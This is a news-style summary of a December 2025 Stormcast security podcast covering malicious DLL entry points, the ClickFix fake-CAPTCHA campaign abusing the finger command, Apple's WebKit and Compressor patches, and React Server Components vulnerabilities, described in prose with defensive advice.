New Stormcast Episode Highlights Key Cybersecurity Topics

In this edition of Stormcast from Monday, December 15, 2025, Johannes Ullrich, broadcasting from Jacksonville, Florida, covers several key topics in cybersecurity, ranging from malware analysis to recently discovered critical vulnerabilities. The podcast highlights sophisticated attack techniques, best practices for security professionals, and essential updates for operating systems.

The first topic discussed is the analysis of Dynamic Link Libraries (DLLs) on Windows, an often-overlooked element in the study of malicious software. Xavier, a regular contributor, explains that DLLs, used to extend program functionalities, can contain an entry point – a function automatically executed upon loading the library. This mechanism is particularly relevant for malware analysts, as a DLL can be loaded without its functions being explicitly called. If no function is used, malicious activity could be hidden in this entry point, executed in the background. This technique underscores the importance of examining all aspects of a file, even those that seem innocuous, to detect suspicious behaviors.

Next, Brad discusses a recent attack campaign named ClickFix, which exploits a clever social engineering method. Attackers trick victims into copying and pasting PowerShell commands into their terminal, often via a fake CAPTCHA. One trick used to mask malicious intent is the use of the finger command, an old and rarely used protocol that retrieves ASCII data via a TCP connection on port 79. In this case, the finger command is used to download a malicious PowerShell script, which is then automatically executed. This technique illustrates how obsolete tools can be repurposed to bypass modern defenses. For network administrators, this highlights the importance of blocking unnecessary outgoing ports, such as 79, 445 (SMB), or other rarely used ports, to limit potential attack vectors.

Another notable point in this edition is the urgent update published by Apple for all its operating systems, fixing no less than 48 vulnerabilities. Among these, two critical flaws in WebKit – the rendering engine used by Safari and other applications – have particularly caught attention. These vulnerabilities, already exploited in targeted attacks before the release of patches, potentially allow the execution of arbitrary code. Although the attacks remain limited and no public exploit is known, Johannes Ullrich recommends applying these updates as soon as possible, without panicking. He also reminds us that patches released on a Friday can go unnoticed, emphasizing the importance of proactive monitoring. Additionally, Apple fixed a flaw in Compressor, a video compression utility that, when active, listens to local network traffic and can execute arbitrary code upon receiving malicious data. Although this software is not constantly running, this vulnerability reminds us that even specialized tools can become targets if not updated.

Finally, the podcast discusses recent vulnerabilities in React Server Components, a popular framework for web application development. Three flaws have been identified: two causing denial of service (DoS) and a third, although less critical in terms of CVSS score, potentially allowing source code leakage. This latter flaw manifests when user-submitted data is "stringified" (converted to a string), which can accidentally include code fragments in HTTP responses. Applications vulnerable to the React to Shell flaw (a previous vulnerability in the same framework) are likely also exposed to these new issues. For developers, this underscores the importance of carefully validating and sanitizing user inputs, as well as following best security practices for modern frameworks.

In conclusion, this edition of Stormcast provides a comprehensive overview of current threats and best practices to adopt. Whether for malware analysts, network administrators, or developers, the shared information helps better understand risks and adopt appropriate preventive measures. Johannes Ullrich also announces that the release of future episodes might be brought forward due to his teaching schedule in Europe, inviting listeners to stay tuned for updates.